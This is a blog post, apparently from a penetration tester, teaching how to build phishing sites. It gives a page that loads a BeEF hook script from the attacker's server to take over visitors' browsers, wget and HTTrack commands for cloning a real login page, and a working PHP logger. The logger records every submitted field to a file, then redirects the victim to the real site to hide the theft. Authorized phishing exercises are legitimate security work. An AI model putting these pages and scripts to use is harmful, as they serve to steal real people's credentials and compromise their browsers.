2015/04/02

Phishing 101: Cloning a Site

Many phishing exercises/engagements require both sending a malicious email and standing up a malicious website or web server. This is certainly the case when the goal is to collect credentials or to exploit the target's web browser.

Before we get into crafting and sending emails, we need to make a malicious website. There are a few ways to go about this.

Browser Exploitation

First, you could create a dummy site that contains only malicious code and does not really need to display anything to the user.  This is common with browser attacks.  One example of this approach is the BeEF (Browser Exploitation Framework) project.

The BeEF project is a penetration testing tool focused on attacking and exploiting web browsers. You can find more information about BeEF at the project's website as well as on its GitHub page.

If you take this approach, BeEF makes it very easy: once you have BeEF running, create a web page that contains a line similar to:
<script type="text/javascript" src="http://127.0.0.1:3000/hook.js"></script>
Replace "127.0.0.1" with the IP address of the Internet-facing system that BeEF is running on.  Then send the target an email instructing them to visit the website containing that line; once they do, you should have a successfully hooked (compromised) web browser.
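Putting that together, a minimal dummy page hosting the hook might look like the following (the IP address and port are placeholders for your own BeEF server):

```html
<!DOCTYPE html>
<html>
  <head>
    <title>Loading...</title>
    <!-- placeholder: point src at your Internet-facing BeEF server -->
    <script type="text/javascript" src="http://127.0.0.1:3000/hook.js"></script>
  </head>
  <body>
    <!-- the page does not need to display anything meaningful -->
    <p>Please wait while the page loads...</p>
  </body>
</html>
```

As soon as the target's browser loads this page, hook.js runs and the browser shows up in the BeEF console.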

Information/Credential Harvesting

Now for the second type of malicious website: a site that looks as close to legitimate as possible, typically used to capture credentials or other sensitive information such as usernames, passwords, RSA tokens, etc...

To make such a site, you can:
  • use "wget" to clone an existing site, then edit it
  • make it entirely by hand
  • use a dedicated site-cloning tool and then edit the results

If you wish to use "wget" to clone a site, the following options will come in handy.
  • perform full clone:
    • wget -m -p -k <URL>
      • -m = Mirroring : This option turns on recursion and time-stamping, sets infinite recursion depth.
      • -p = Page Requisites : This option causes wget to download all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.
  • only clone X levels deep:
    • wget -r -l 1 -p -k <URL>
      • -r = Enable recursion
      • -l X = Limit recursion to X levels deep
      • -p = Page Requisites : This option downloads all the files that are necessary to properly display a given HTML page.
      • -k = After the download is complete, convert the links in the document to make them suitable for local viewing.

You may ask why you would not always just do a full clone.  Well, if you only want to capture the values entered into a particular form, you only need to clone that one page, not the rest of the site.
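For example, to grab just a single login page along with the files needed to render it (the URL below is a placeholder), the page-requisites option alone is enough:

```shell
# clone only one page, plus the images/CSS/JS required to display it;
# -k rewrites links so the local copy renders correctly when served
wget -p -k https://www.example.com/login.html
```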

Now that you have cloned the site (or as much of it as you need), you will need to edit the HTML and modify the forms so that they capture the credentials.  This is also the time to make any other edits you desire. When editing forms, it is useful to have a secondary script handy that can be used as the form's "action". The code sample below is a simple PHP script that will log all GET and POST parameters passed to it.
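A minimal sketch of such a script might look like this (the log file path and the redirect target are placeholder assumptions):

```php
<?php
// logger.php - set this as the cloned form's "action"; it records every
// GET and POST parameter, then forwards the visitor to the real site.
// NOTE: the log path and redirect URL below are placeholders.

$entry = sprintf(
    "[%s] %s GET=%s POST=%s\n",
    date('c'),
    $_SERVER['REMOTE_ADDR'] ?? 'unknown',
    json_encode($_GET),
    json_encode($_POST)
);

// append with an exclusive lock so concurrent visits do not interleave
file_put_contents('/tmp/phish.log', $entry, FILE_APPEND | LOCK_EX);

// redirect to the legitimate site so the visit looks normal to the target
header('Location: https://www.example.com/');
```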

When creating a website by hand, you can get a bit of a head start by opening the page you want to clone, choosing "View Source", selecting it all, and copying and pasting it into a new HTML document. Then, as before, make any necessary changes to the HTML.

There are a few tools available to help such as HTTrack. According to the website,
[HTTrack] allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
Again, as before, you will need to make any necessary changes to the HTML.
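As a concrete example, a basic HTTrack mirror from the command line might look like this (the URL, output directory, and filter pattern are placeholders):

```shell
# mirror the site into ./mirror, following only links under example.com;
# -O sets the output path, the "+" pattern is an include filter, -v is verbose
httrack "https://www.example.com/" -O "./mirror" "+*.example.com/*" -v
```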

Finally, I would like to mention a script I wrote that helps clone a site and automatically make any necessary edits to the contained forms.  The script can be found at https://github.com/tatanus/PHISHING/blob/master/SCRIPTS/clonesite.py.  I will publish a new blog post describing the details of this script in the next few days.
